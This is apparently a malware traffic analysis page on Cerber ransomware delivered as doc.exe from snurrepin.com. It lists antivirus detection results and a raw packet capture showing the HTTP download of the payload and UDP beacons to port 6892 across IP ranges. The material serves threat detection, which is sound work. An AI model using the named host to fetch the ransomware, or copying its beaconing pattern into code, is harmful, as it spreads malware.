Snurrepin.com Delivers doc.exe CERBER Ransomware Malware PCAP File Download Traffic Analysis

SHA256:          69e6f40fa4231edb47d52b5a19de15720b3e5fc19f68bb3060e9b6e06c307d42
File name:       doc.exe
Detection ratio: 9 / 56
Analysis date:   2016-11-26 23:56:21 UTC

Engine                   Result                                          Update
CrowdStrike Falcon (ML)  malicious_confidence_75% (W)                    20161024
ESET-NOD32               NSIS/Injector.KT                                20161126
Invincea                 virus.win32.sality.at                           20161018
Kaspersky                UDS:DangerousObject.Multi.Generic               20161127
McAfee                   Artemis!4D4D6D2C7CC6                            20161127
McAfee-GW-Edition        BehavesLike.Win32.Downloader.dc                 20161126
Qihoo-360                HEUR/QVM42.0.0000.Malware.Gen                   20161127
Rising                   Malware.FakePDF@CV!1.6AC1-LyO8PTdeqgK (cloud)   20161126
Symantec                 Ransom.Cerber                                   20161127

2016-11-26 17:05:51.661059 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /doc.exe HTTP/1.1
E.....@....Y...fY!...@.PQf-.DC..P..."S..GET /doc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=214078-
Unless-Modified-Since: Sat, 26 Nov 2016 19:38:19 GMT
If-Range: "46448-54239617f5e88"
Host: snurrepin.com
Connection: Keep-Alive

2016-11-26 17:06:03.817526 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 555, win 256, length 0
E..(y.@....j...f.m.1.L..r.MT...xP.............
2016-11-26 17:06:06.750700 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [F.], seq 1829, ack 4858, win 257, length 0
E..(y.@....i...f.m.1.>.....Q../SP.............
2016-11-26 17:06:06.750911 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [F.], seq 274, ack 669, win 256, length 0
E..(.V@...D$...f.m...3.P...-.}..P.............
2016-11-26 17:06:06.751057 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [F.], seq 2487, ack 225525, win 256, length 0
E..(.a@........f.@Ip.6...J.F....P.............
2016-11-26 17:06:06.751180 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [F.], seq 1584, ack 172165, win 256, length 0
E..(.b@........f.@Ip.=..^.g..S..P...NF........
2016-11-26 17:06:06.752556 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [F.], seq 392, ack 74057, win 256, length 0
E..(..@........fY!...@.PQf/`DD./P...L.........
2016-11-26 17:06:06.752624 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [F.], seq 878, ack 555, win 256, length 0
E..(y.@....g...f.m.1.L..r.MT...xP.............
2016-11-26 17:06:06.752691 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [F.], seq 1882, ack 75023, win 256, length 0
E..(.c@........f.@Ip.<..........P....-........
2016-11-26 17:06:06.752880 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [F.], seq 2817, ack 394566, win 695, length 0
E..(.d@........f.@Ip.7..B.......P...Y.........
2016-11-26 17:06:06.784774 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [R.], seq 2488, ack 225554, win 0, length 0
E..(.e@........f.@Ip.6...J.G....P.............
2016-11-26 17:06:06.785440 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [R.], seq 1883, ack 75052, win 0, length 0
E..(.f@........f.@Ip.<..........P.............
2016-11-26 17:06:06.793362 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [R.], seq 2818, ack 394595, win 0, length 0
E..(.g@........f.@Ip.7..B......2P...\K........
2016-11-26 17:06:06.793768 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [R.], seq 1585, ack 172194, win 0, length 0
E..(.h@........f.@Ip.=..^.g..S..P...O%........
2016-11-26 17:06:06.833382 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [.], ack 4859, win 257, length 0
E..(y.@....f...f.m.1.>.....R../TP.............
2016-11-26 17:06:06.838734 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 556, win 256, length 0
E..(y.@....e...f.m.1.L..r.MU...yP.............
2016-11-26 17:06:06.839238 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [.], ack 670, win 256, length 0
E..(.Z@...D ...f.m...3.P.....}..P.............
2016-11-26 17:06:06.991510 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [.], ack 74058, win 256, length 0
E..(..@........fY!...@.PQf/aDD.0P...L.........
2016-11-26 17:06:12.808611 IP 192.168.1.102.56893 > 192.168.0.0.6892: UDP, length 10
E..&B.....v....f.....=....CYhi008e906a........
2016-11-26 17:06:12.808689 IP 192.168.1.102.56893 > 192.168.0.1.6892: UDP, length 10
E..&>.....z....f.....=....CXhi008e906a........
2016-11-26 17:06:12.808695 IP 192.168.1.102.56893 > 192.168.0.2.6892: UDP, length 10
E..&.......f...f.....=....CWhi008e906a........
2016-11-26 17:06:12.808741 IP 192.168.1.102.56893 > 192.168.0.3.6892: UDP, length 10
E..&|{....<....f.....=....CVhi008e906a........
2016-11-26 17:06:12.808826 IP 192.168.1.102.56893 > 192.168.0.4.6892: UDP, length 10
E..&e.....Sw...f.....=....CUhi008e906a........
2016-11-26 17:06:12.808832 IP 192.168.1.102.56893 > 192.168.0.5.6892: UDP, length 10
E..&a.....W....f.....=....CThi008e906a........
2016-11-26 17:06:12.808878 IP 192.168.1.102.56893 > 192.168.0.6.6892: UDP, length 10
E..&'......j...f.....=....CShi008e906a........
2016-11-26 17:06:12.808961 IP 192.168.1.102.56893 > 192.168.0.7.6892: UDP, length 10

2016-11-26 17:06:12.810660 IP 192.168.1.102.56893 > 194.165.16.13.6892: UDP, length 10
E..&    B.........f.....=....1Ohi008e906a........
2016-11-26 17:06:12.810755 IP 192.168.1.102.56893 > 194.165.16.14.6892: UDP, length 10
E..&C,....c....f.....=....1Nhi008e906a........
2016-11-26 17:06:12.810761 IP 192.168.1.102.56893 > 194.165.16.15.6892: UDP, length 10
E..&O;....W....f.....=....1Mhi008e906a........
2016-11-26 17:06:12.810837 IP 192.168.1.102.56893 > 194.165.16.16.6892: UDP, length 10
E..&o^....7....f.....=....1Lhi008e906a........
2016-11-26 17:06:12.810842 IP 192.168.1.102.56893 > 194.165.16.17.6892: UDP, length 10
E..&c.....Cu...f.....=....1Khi008e906a........
2016-11-26 17:06:12.810887 IP 192.168.1.102.56893 > 194.165.16.18.6892: UDP, length 10
E..&)i....}....f.....=....1Jhi008e906a........
2016-11-26 17:06:12.810972 IP 192.168.1.102.56893 > 194.165.16.19.6892: UDP, length 10
E..&%x.........f.....=....1Ihi008e906a........
2016-11-26 17:06:12.811021 IP 192.168.1.102.56893 > 194.165.16.20.6892: UDP, length 10
E..&.V.........f.....=....1Hhi008e906a........
2016-11-26 17:06:12.811026 IP 192.168.1.102.56893 > 194.165.16.21.6892: UDP, length 10
E..&.......y...f.....=....1Ghi008e906a........
2016-11-26 17:06:12.811078 IP 192.168.1.102.56893 > 194.165.16.22.6892: UDP, length 10
E..&Jq....\....f.....=....1Fhi008e906a........
2016-11-26 17:06:12.811153 IP 192.168.1.102.56893 > 194.165.16.23.6892: UDP, length 10
E..&F.....`|...f.....=....1Ehi008e906a........
2016-11-26 17:06:12.811158 IP 192.168.1.102.56893 > 194.165.16.24.6892: UDP, length 10
E..&...........f.....=....1Dhi008e906a........
2016-11-26 17:06:12.811203 IP 192.168.1.102.56893 > 194.165.16.25.6892: UDP, length 10
E..&...........f.....=....1Chi008e906a........
2016-11-26 17:06:12.811273 IP 192.168.1.102.56893 > 194.165.16.26.6892: UDP, length 10
E..&X.....N....f.....=....1Bhi008e906a........
2016-11-26 17:06:12.811330 IP 192.168.1.102.56893 > 194.165.16.27.6892: UDP, length 10
E..&T.....Q....f.....=....1Ahi008e906a........
2016-11-26 17:06:12.811380 IP 192.168.1.102.56893 > 194.165.16.28.6892: UDP, length 10
E..&}.....)....f.....=....1@hi008e906a........
2016-11-26 17:06:12.811385 IP 192.168.1.102.56893 > 194.165.16.29.6892: UDP, length 10
E..&r.....4....f.....=....1?hi008e906a........
2016-11-26 17:06:12.811438 IP 192.168.1.102.56893 > 194.165.16.30.6892: UDP, length 10
E..&;.....j....f.....=....1>hi008e906a........
2016-11-26 17:06:12.811511 IP 192.168.1.102.56893 > 194.165.16.31.6892: UDP, length 10
E..&8.....n....f.....=....1=hi008e906a........
2016-11-26 17:06:12.811516 IP 192.168.1.102.56893 > 194.165.16.32.6892: UDP, length 10
E..&l.....:....f... .=....1<hi008e906a........
2016-11-26 17:06:12.811563 IP 192.168.1.102.56893 > 194.165.16.33.6892: UDP, length 10
E..&g.....>....f...!.=....1;hi008e906a........
2016-11-26 17:06:12.811645 IP 192.168.1.102.56893 > 194.165.16.34.6892: UDP, length 10
E..&......x....f...".=....1:hi008e906a........
2016-11-26 17:06:12.811650 IP 192.168.1.102.56893 > 194.165.16.35.6892: UDP, length 10
E..&!..........f...#.=....19hi008e906a........
2016-11-26 17:06:12.811698 IP 192.168.1.102.56893 > 194.165.16.36.6892: UDP, length 10
E..&    ..........f...$.=....18hi008e906a........
2016-11-26 17:06:12.811779 IP 192.168.1.102.56893 > 194.165.16.37.6892: UDP, length 10